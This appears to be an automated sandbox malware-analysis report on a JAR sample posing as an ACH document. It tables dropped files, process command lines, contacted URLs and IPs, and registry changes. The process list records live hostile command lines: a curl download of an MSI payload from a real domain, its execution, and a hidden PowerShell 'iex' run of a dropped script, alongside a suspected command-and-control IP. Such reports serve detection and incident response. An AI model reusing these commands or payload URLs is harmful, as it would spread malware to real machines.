Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
23-April-24-ACH-7fa67756.jar
|
Java archive data (JAR)
|
initial sample
|
 |
|
|
C:\ProgramData\lgp\sjm
|
ASCII text
|
dropped
|
|
|
|
C:\Config.Msi\46f336.rbs
|
data
|
modified
|
||
|
C:\ProgramData\Oracle\Java\.oracle_jre_usage\b5820291038aa69c.timestamp
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y2sljm0c.nhc.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yp3c1nj5.x2f.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\hsperfdata_user\6152
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDesusertions\590aee7bdd69b59b.customDesusertions-ms (copy)
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDesusertions\YBK27W652F4IJAVOUCH5.temp
|
data
|
dropped
|
||
|
C:\Windows\Installer\46f335.msi
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation
Database, Subject: This setup package will Install MSD Setup version 3.5.0, Author: MSD Setup, Keywords: Installer, Comments:
This installer database contains the logic and data required to install MSD Setup., Template: Intel;1033, Revision Number:
{D59C64C0-985A-437E-9F88-C578DBDDC731}, Create Time/Date: Tue Apr 23 10:56:26 2024, Last Saved Time/Date: Tue Apr 23 10:56:26
2024, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1528),
Security: 2
|
dropped
|
||
|
C:\Windows\Installer\46f337.msi
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation
Database, Subject: This setup package will Install MSD Setup version 3.5.0, Author: MSD Setup, Keywords: Installer, Comments:
This installer database contains the logic and data required to install MSD Setup., Template: Intel;1033, Revision Number:
{D59C64C0-985A-437E-9F88-C578DBDDC731}, Create Time/Date: Tue Apr 23 10:56:26 2024, Last Saved Time/Date: Tue Apr 23 10:56:26
2024, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1528),
Security: 2
|
dropped
|
||
|
C:\Windows\Installer\MSIF45E.tmp
|
data
|
dropped
|
||
|
C:\Windows\Installer\SourceHash{5388A5D6-8B37-4242-B64C-4D72F236B407}
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
||
|
C:\Windows\Installer\inprogressinstallinfo.ipi
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
||
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
|
C:\Windows\Temp\~DF038DB82E145104A8.TMP
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
||
|
C:\Windows\Temp\~DF165C3EF9705925E4.TMP
|
data
|
dropped
|
||
|
C:\Windows\Temp\~DF2B96C09185FA214E.TMP
|
data
|
dropped
|
||
|
C:\Windows\Temp\~DF32A04107112E9A4B.TMP
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
||
|
C:\Windows\Temp\~DF3D7219F5911854F7.TMP
|
data
|
dropped
|
||
|
C:\Windows\Temp\~DF5EE5930C625E6338.TMP
|
data
|
dropped
|
||
|
C:\Windows\Temp\~DF86EB1E75F831F209.TMP
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
||
|
C:\Windows\Temp\~DF89B53ECD342FBFE9.TMP
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
||
|
C:\Windows\Temp\~DF8C64761B64534E51.TMP
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
||
|
C:\Windows\Temp\~DFB7E94AAC73192A94.TMP
|
data
|
dropped
|
||
|
C:\Windows\Temp\~DFE10EA429A44556AB.TMP
|
data
|
dropped
|
||
|
C:\Windows\Temp\~DFE1FFE766D8E9718D.TMP
|
data
|
dropped
|
||
|
C:\downloads\aHPCrYM1.msi
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation
Database, Subject: This setup package will Install MSD Setup version 3.5.0, Author: MSD Setup, Keywords: Installer, Comments:
This installer database contains the logic and data required to install MSD Setup., Template: Intel;1033, Revision Number:
{D59C64C0-985A-437E-9F88-C578DBDDC731}, Create Time/Date: Tue Apr 23 10:56:26 2024, Last Saved Time/Date: Tue Apr 23 10:56:26
2024, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1528),
Security: 2
|
dropped
|
There are 19 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\SysWOW64\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -javaagent:"C:\Users\user\AppData\Local\Temp\jartracer.jar"
-jar "C:\Users\user\Desktop\23-April-24-ACH-7fa67756.jar"" >> C:\cmdlinestart.log 2>&1
|
|
|
|
C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
|
"C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -javaagent:"C:\Users\user\AppData\Local\Temp\jartracer.jar" -jar "C:\Users\user\Desktop\23-April-24-ACH-7fa67756.jar"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
cmd /c curl.exe --output C:\downloads\aHPCrYM1.msi --url https://cryptonews.direct/wp-content/themes/twentytwentytwo/MSD_Setup_sib.msi
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
cmd /c C:\downloads\aHPCrYM1.msi
|
|
|
|
C:\Windows\System32\cmd.exe
|
"cmd" /c start /min C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden "iex (gc ('C:\ProgramData\lgp\sjm')
| out-string)"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden "iex (gc ('C:\ProgramData\lgp\sjm') | out-string)"
|
|
|
|
C:\Windows\System32\PING.EXE
|
"C:\Windows\system32\PING.EXE" 1.1.1.1
|
|
|
|
C:\Windows\System32\PING.EXE
|
"C:\Windows\system32\PING.EXE" 1.1.1.1
|
|
|
|
C:\Windows\System32\PING.EXE
|
"C:\Windows\system32\PING.EXE" 1.1.1.1
|
|
|
|
C:\Windows\System32\PING.EXE
|
"C:\Windows\system32\PING.EXE" 1.1.1.1
|
|
|
|
C:\Windows\System32\PING.EXE
|
"C:\Windows\system32\PING.EXE" 1.1.1.1
|
|
|
|
C:\Windows\System32\PING.EXE
|
"C:\Windows\system32\PING.EXE" 1.1.1.1
|
|
|
|
C:\Windows\System32\PING.EXE
|
"C:\Windows\system32\PING.EXE" 1.1.1.1
|
|
|
|
C:\Windows\System32\PING.EXE
|
"C:\Windows\system32\PING.EXE" 1.1.1.1
|
|
|
|
C:\Windows\System32\PING.EXE
|
"C:\Windows\system32\PING.EXE" 1.1.1.1
|
|
|
|
C:\Windows\System32\PING.EXE
|
"C:\Windows\system32\PING.EXE" 1.1.1.1
|
|
|
|
C:\Windows\System32\PING.EXE
|
"C:\Windows\system32\PING.EXE" 1.1.1.1
|
|
|
|
C:\Windows\System32\PING.EXE
|
"C:\Windows\system32\PING.EXE" 1.1.1.1
|
|
|
|
C:\Windows\System32\PING.EXE
|
"C:\Windows\system32\PING.EXE" 1.1.1.1
|
|
|
|
C:\Windows\System32\PING.EXE
|
"C:\Windows\system32\PING.EXE" 1.1.1.1
|
|
|
|
C:\Windows\System32\PING.EXE
|
"C:\Windows\system32\PING.EXE" 1.1.1.1
|
|
|
|
C:\Windows\System32\PING.EXE
|
"C:\Windows\system32\PING.EXE" 1.1.1.1
|
|
|
|
C:\Windows\System32\PING.EXE
|
"C:\Windows\system32\PING.EXE" 1.1.1.1
|
|
|
|
C:\Windows\System32\PING.EXE
|
"C:\Windows\system32\PING.EXE" 1.1.1.1
|
|
|
|
C:\Windows\System32\PING.EXE
|
"C:\Windows\system32\PING.EXE" 1.1.1.1
|
|
|
|
C:\Windows\System32\PING.EXE
|
"C:\Windows\system32\PING.EXE" 1.1.1.1
|
|
|
|
C:\Windows\System32\PING.EXE
|
"C:\Windows\system32\PING.EXE" 1.1.1.1
|
|
|
|
C:\Windows\System32\PING.EXE
|
"C:\Windows\system32\PING.EXE" 1.1.1.1
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\icacls.exe
|
C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\curl.exe
|
curl.exe --output C:\downloads\aHPCrYM1.msi --url https://cryptonews.direct/wp-content/themes/twentytwentytwo/MSD_Setup_sib.msi
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\System32\msiexec.exe" /i "C:\downloads\aHPCrYM1.msi"
|
||
|
C:\Windows\System32\msiexec.exe
|
C:\Windows\system32\msiexec.exe /V
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\dllhost.exe
|
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 30 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://64.95.10.191/
|
unknown
|
||
|
https://cryptonews.direct/wp-content/themes/twentytwentytwo/MSD_Setup_sib.msiC
|
unknown
|
||
|
https://cryptonews.direct/wp-content/themes/twentytwentytwo/MSD_Setup_sib.msiS
|
unknown
|
||
|
http://java.oracle.com/
|
unknown
|
||
|
https://cryptonews.direct/wp-content/themes/twentytwentytwo/MSD_Setup_sib.msiC:
|
unknown
|
||
|
https://cryptonews.direct/wp-content/themes/twentytwentytwo/MSD_Setup_sib.msicurl.exe
|
unknown
|
||
|
https://cryptonews.direct/wp-content/themes/twentytwentytwo/MSD_Setup_sib.msi
|
172.67.168.231
|
||
|
https://cryptonews.direct/wp-content/themes/twentytwentytwo/MSD_Setup_sib.msiXq
|
unknown
|
||
|
http://bugreport.sun.com/bugreport/k
|
unknown
|
||
|
https://cryptonews.direct/wp-content/themes/twentytwentytwo/MSD_Setup_sib.msiWinSta0
|
unknown
|
||
|
http://bugreport.sun.com/bugreport/
|
unknown
|
||
|
http://64.95.10.191/2220045058
|
64.95.10.191
|
There are 2 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
cryptonews.direct
|
172.67.168.231
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
172.67.168.231
|
cryptonews.direct
|
United States
|
||
|
64.95.10.191
|
unknown
|
United States
|
||
|
127.0.0.1
|
unknown
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
|
{8D80504A-0826-40C5-97E1-EBC68F953792} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\msiexec.exe.FriendlyAppName
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\msiexec.exe.ApplicationCompany
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
|
Owner
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
|
SessionHash
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
|
Sequence
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders
|
C:\Config.Msi\
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Rollback\Scripts
|
C:\Config.Msi\46f336.rbs
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Rollback\Scripts
|
C:\Config.Msi\46f336.rbsLow
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders
|
C:\Users\user\AppData\Roaming\Microsoft\Installer\
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Components\6D5A883573B824246BC4D4270833EE88
|
6D5A883573B824246BC4D4272F634B70
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Components\6D5A883573B824246BC4D4275F1102A2
|
6D5A883573B824246BC4D4272F634B70
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Components\6D5A883573B824246BC4D42754FA10A1
|
6D5A883573B824246BC4D4272F634B70
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Components\6D5A883573B824246BC4D42788505742
|
6D5A883573B824246BC4D4272F634B70
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Components\6D5A883573B824246BC4D427536B41A7
|
6D5A883573B824246BC4D4272F634B70
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders
|
C:\ProgramData\lgp\
|
||
|
HKEY_CURRENT_USER\SOFTWARE\WixSharp\Used
|
NULL
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\6D5A883573B824246BC4D4272F634B70\InstallProperties
|
LocalPackage
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\6D5A883573B824246BC4D4272F634B70\InstallProperties
|
AuthorizedCDFPrefix
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\6D5A883573B824246BC4D4272F634B70\InstallProperties
|
Comments
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\6D5A883573B824246BC4D4272F634B70\InstallProperties
|
Contact
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\6D5A883573B824246BC4D4272F634B70\InstallProperties
|
DisplayVersion
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\6D5A883573B824246BC4D4272F634B70\InstallProperties
|
HelpLink
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\6D5A883573B824246BC4D4272F634B70\InstallProperties
|
HelpTelephone
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\6D5A883573B824246BC4D4272F634B70\InstallProperties
|
InstallDate
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\6D5A883573B824246BC4D4272F634B70\InstallProperties
|
InstallLocation
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\6D5A883573B824246BC4D4272F634B70\InstallProperties
|
InstallSource
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\6D5A883573B824246BC4D4272F634B70\InstallProperties
|
ModifyPath
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\6D5A883573B824246BC4D4272F634B70\InstallProperties
|
Publisher
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\6D5A883573B824246BC4D4272F634B70\InstallProperties
|
Readme
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\6D5A883573B824246BC4D4272F634B70\InstallProperties
|
Size
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\6D5A883573B824246BC4D4272F634B70\InstallProperties
|
EstimatedSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\6D5A883573B824246BC4D4272F634B70\InstallProperties
|
UninstallString
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\6D5A883573B824246BC4D4272F634B70\InstallProperties
|
URLInfoAbout
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\6D5A883573B824246BC4D4272F634B70\InstallProperties
|
URLUpdateInfo
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\6D5A883573B824246BC4D4272F634B70\InstallProperties
|
VersionMajor
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\6D5A883573B824246BC4D4272F634B70\InstallProperties
|
VersionMinor
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\6D5A883573B824246BC4D4272F634B70\InstallProperties
|
WindowsInstaller
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\6D5A883573B824246BC4D4272F634B70\InstallProperties
|
Version
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\6D5A883573B824246BC4D4272F634B70\InstallProperties
|
Language
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5388A5D6-8B37-4242-B64C-4D72F236B407}
|
AuthorizedCDFPrefix
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5388A5D6-8B37-4242-B64C-4D72F236B407}
|
Comments
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5388A5D6-8B37-4242-B64C-4D72F236B407}
|
Contact
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5388A5D6-8B37-4242-B64C-4D72F236B407}
|
DisplayVersion
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5388A5D6-8B37-4242-B64C-4D72F236B407}
|
HelpLink
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5388A5D6-8B37-4242-B64C-4D72F236B407}
|
HelpTelephone
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5388A5D6-8B37-4242-B64C-4D72F236B407}
|
InstallDate
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5388A5D6-8B37-4242-B64C-4D72F236B407}
|
InstallLocation
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5388A5D6-8B37-4242-B64C-4D72F236B407}
|
InstallSource
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5388A5D6-8B37-4242-B64C-4D72F236B407}
|
ModifyPath
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5388A5D6-8B37-4242-B64C-4D72F236B407}
|
Publisher
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5388A5D6-8B37-4242-B64C-4D72F236B407}
|
Readme
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5388A5D6-8B37-4242-B64C-4D72F236B407}
|
Size
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5388A5D6-8B37-4242-B64C-4D72F236B407}
|
EstimatedSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5388A5D6-8B37-4242-B64C-4D72F236B407}
|
UninstallString
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5388A5D6-8B37-4242-B64C-4D72F236B407}
|
URLInfoAbout
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5388A5D6-8B37-4242-B64C-4D72F236B407}
|
URLUpdateInfo
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5388A5D6-8B37-4242-B64C-4D72F236B407}
|
VersionMajor
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5388A5D6-8B37-4242-B64C-4D72F236B407}
|
VersionMinor
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5388A5D6-8B37-4242-B64C-4D72F236B407}
|
WindowsInstaller
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5388A5D6-8B37-4242-B64C-4D72F236B407}
|
Version
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5388A5D6-8B37-4242-B64C-4D72F236B407}
|
Language
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UpgradeCodes\EA0EEFD4EB804094F8151EB6BB8A66A6
|
6D5A883573B824246BC4D4272F634B70
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\6D5A883573B824246BC4D4272F634B70\InstallProperties
|
DisplayName
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5388A5D6-8B37-4242-B64C-4D72F236B407}
|
DisplayName
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Features\6D5A883573B824246BC4D4272F634B70
|
MSD_Setup_
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\6D5A883573B824246BC4D4272F634B70\Features
|
MSD_Setup_
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\6D5A883573B824246BC4D4272F634B70\Patches
|
AllPatches
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Products\6D5A883573B824246BC4D4272F634B70
|
ProductName
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Products\6D5A883573B824246BC4D4272F634B70
|
PackageCode
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Products\6D5A883573B824246BC4D4272F634B70
|
Language
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Products\6D5A883573B824246BC4D4272F634B70
|
Version
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Products\6D5A883573B824246BC4D4272F634B70
|
Assignment
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Products\6D5A883573B824246BC4D4272F634B70
|
AdvertiseFlags
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Products\6D5A883573B824246BC4D4272F634B70
|
InstanceType
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Products\6D5A883573B824246BC4D4272F634B70
|
AuthorizedLUAApp
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Products\6D5A883573B824246BC4D4272F634B70
|
DeploymentFlags
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\UpgradeCodes\EA0EEFD4EB804094F8151EB6BB8A66A6
|
6D5A883573B824246BC4D4272F634B70
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Products\6D5A883573B824246BC4D4272F634B70\SourceList
|
PackageName
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Products\6D5A883573B824246BC4D4272F634B70\SourceList\Net
|
1
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Products\6D5A883573B824246BC4D4272F634B70\SourceList\Media
|
1
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Products\6D5A883573B824246BC4D4272F634B70
|
Clients
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Products\6D5A883573B824246BC4D4272F634B70\SourceList
|
LastUsedSource
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\1e\417C44EB
|
@%SystemRoot%\System32\ci.dll,-100
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\1e\417C44EB
|
@%SystemRoot%\System32\ci.dll,-101
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\1e\417C44EB
|
@%SystemRoot%\system32\dnsapi.dll,-103
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\1e\417C44EB
|
@%SystemRoot%\System32\fveui.dll,-843
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\1e\417C44EB
|
@%SystemRoot%\System32\fveui.dll,-844
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\1e\417C44EB
|
@%SystemRoot%\System32\wuaueng.dll,-400
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\1e\417C44EB
|
@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\1e\417C44EB
|
@%SystemRoot%\system32\NgcRecovery.dll,-100
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
